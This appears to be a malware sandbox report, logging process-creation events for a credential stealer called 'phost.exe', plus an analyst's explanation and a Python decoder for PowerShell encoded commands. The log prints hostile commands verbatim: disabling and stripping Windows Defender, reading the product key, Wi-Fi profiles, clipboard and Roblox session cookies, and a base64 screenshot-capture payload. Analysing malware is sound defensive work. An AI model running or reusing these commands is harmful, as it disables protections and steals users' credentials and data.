              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABjAGEAdABjAGgAIAAoAEUAeABjAGUAcAB0AGkAbwBuACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAvAC8AIABIAGEAbgBkAGwAZQAgAGEAbgB5ACAAZQB4AGMAZQBwAHQAaQBvAG4AcwAgAGgAZQByAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcgBlAHMAdQBsAHQAcwA7AA0ACgAgACAAIAB9AA0ACgB9AA0ACgAiAEAADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwBvAHUAcgBjAGUAIAAtAFIAZQBmAGUAcgBlAG4AYwBlAGQAQQBzAHMAZQBtAGIAbABpAGUAcwAgAB
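Analyst note, added to this report rather than generated by Joe Sandbox: the -EncodedCommand argument above is base64 over the UTF-16LE text of the script. Decoded, it defines a C# class Screenshot whose CaptureScreens() walks Screen.AllScreens, copies each display into a Bitmap with Graphics.CopyFromScreen, and is fed to Add-Type -TypeDefinition; the report cuts the blob off after -ReferencedAssemblies. That in-memory compile is what produces the csc.exe and cvtres.exe children of powershell.exe listed further down. The lower-cased copies of this command later in the report cannot be decoded from that rendering, because base64 is case-sensitive; decode the mixed-case copy. The Python below is example code written for this note, not the report's or the malware's: it pulls the argument out of a command line, tolerates the truncation, and refuses a case-folded blob. SAMPLE_SCRIPT and SAMPLE_CMDLINE are a short constructed stand-in, not the decoded payload.

```python
"""Decode a powershell.exe -EncodedCommand argument from a process-creation log line.

Added analyst example, not part of the Joe Sandbox report. SAMPLE_CMDLINE is
constructed for the test: it re-encodes a short stand-in script with the same
scheme PowerShell uses (UTF-16LE text, then base64). The report's blob is far
longer and is cut off by the report viewer, so the decoder keeps the readable
prefix of a truncated blob instead of failing.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for the Add-Type payload seen in the report; not the
# report's own script text.
SAMPLE_SCRIPT = '$source = @"\r\nusing System;\r\n"@\r\nAdd-Type -TypeDefinition $source'
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
# Longest alternative first so "-encodedcommand" is not matched as "-e" + junk.
_ENC_RE = re.compile(
    r"-e(?:ncodedcommand|ncodedc|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


@dataclass
class DecodeResult:
    status: str                 # "none", "case_folded", "ok" or "partial"
    script: Optional[str] = None


def extract_blob(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand, or None if absent."""
    m = _ENC_RE.search(cmdline)
    return m.group(1) if m else None


def looks_case_folded(blob: str) -> bool:
    """Heuristic: UTF-16LE text has a 0x00 in every other byte, so a genuine blob
    of any length contains many 'A' characters. A blob with no upper-case letter
    at all has been lower-cased somewhere in the logging pipeline and, base64
    being case-sensitive, will not decode back to the original script."""
    return blob == blob.lower()


def decode_encoded_command(cmdline: str) -> DecodeResult:
    blob = extract_blob(cmdline)
    if blob is None:
        return DecodeResult("none")
    if looks_case_folded(blob):
        return DecodeResult("case_folded")
    # Drop a trailing partial base64 group (report truncation), then a dangling
    # odd byte, so a cut-off blob still yields the readable prefix of the script.
    usable = blob[: len(blob) - len(blob) % 4]
    raw = base64.b64decode(usable)
    raw = raw[: len(raw) - len(raw) % 2]
    script = raw.decode("utf-16-le", errors="replace")
    status = "ok" if len(blob) % 4 == 0 else "partial"
    return DecodeResult(status, script)


if __name__ == "__main__":
    result = decode_encoded_command(SAMPLE_CMDLINE)
    print(result.status)
    print(result.script)
```

Run against the mixed-case line above, the status comes back "partial" and the script ends just after -ReferencedAssemblies, which is the viewer's cut, not the malware's. A "case_folded" result means the copy you fed in is one of the lower-cased renderings and a different copy of the same line is needed.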
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Users\user\Desktop\phost.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagac